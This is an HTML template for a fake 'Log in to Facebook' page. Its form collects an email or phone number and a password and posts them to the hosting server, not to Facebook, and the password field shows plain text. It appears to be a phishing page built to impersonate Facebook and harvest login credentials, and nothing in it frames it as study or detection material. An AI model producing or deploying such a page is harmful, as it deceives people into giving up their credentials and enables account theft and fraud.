
<link rel="stylesheet" href="/static/login.css">

<div class="main mt-5 mb-5 ">
    <div class="tophead">Facebook</div>
    <div id="r">

    <form action="" method="post">
        
        <center>
             
            <p class="head mt-5">Log in to Facebook</p>
        </center>
        <div  class="mt-4 login-form">
            
            <input type="text" name="uname" class="form-control" placeholder="Email address or phone number">
        </div>
        <div class="login-form">
            
            <input type="text" name="pass" class="form-control" placeholder="Password">
        </div>
        <div class="container-btn">
            <button name="login" class="lg-btn">Login</button>
        </div>
    </form>
</div>
</div>



